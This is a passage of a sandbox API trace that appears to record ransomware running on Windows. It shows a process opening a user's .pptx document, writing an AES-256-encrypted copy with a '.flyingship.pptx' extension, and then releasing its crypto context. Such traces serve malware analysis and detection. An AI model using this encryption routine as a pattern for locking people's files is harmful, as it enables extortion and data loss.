returned 0x9c27c8 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0168.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0168.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0168.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0168.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0168.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0168.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0168.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0168.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0168.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0168.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0168.881] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0168.882] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0168.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0168.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0168.882] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.882] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0168.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0168.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0168.882] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.882] CryptDestroyHash (hHash=0x90af58) returned 1 [0168.882] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dxjhietg4klttzj3vc.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.883] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.883] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0168.885] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.flyingship.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dxjhietg4klttzj3vc.flyingship.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0168.887] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0168.887] ReadFile (in: hFile=0x138, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0xfcf2, lpOverlapped=0x0) returned 1 [0168.890] ReadFile (in: hFile=0x138, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0168.891] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0168.892] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0168.892] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0168.892] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.892] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.892] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2878, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2878*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0168.892] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.892] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.893] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.893] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xfcf2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xfd00) returned 1 [0168.893] CharLowerBuffW (in: lpsz="byte[64769]", cchLength=0xb | out: lpsz="byte[64769]") returned 0xb [0168.894] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.894] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa04888*, pdwDataLen=0x87e820*=0xfcf2, dwBufLen=0xfd00 | out: pbData=0xa04888*, pdwDataLen=0x87e820*=0xfd00) returned 1 [0168.895] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.902] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0168.903] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.903] CryptDestroyKey (hKey=0x90af98) returned 1 [0168.905] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.905] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.905] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.905] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.905] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.905] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.905] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.905] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.905] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.906] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0168.906] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.906] FreeLibrary (hLibModule=0x74f20000) returned 1 [0168.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0168.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0168.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0168.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0168.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0168.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0168.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0168.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0168.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0168.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0168.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0168.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0168.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0168.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0168.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0168.908] CloseHandle (hObject=0x138) returned 1 [0168.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0168.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0168.909] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0168.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0168.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0168.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0168.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0168.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0168.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0168.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0168.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0168.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.910] CloseHandle (hObject=0x120) returned 1 [0168.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0168.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0168.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0168.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0168.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0168.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0168.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0168.927] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0168.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0168.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0168.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0168.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0168.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0168.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0168.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0168.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0168.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0168.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0168.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0168.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 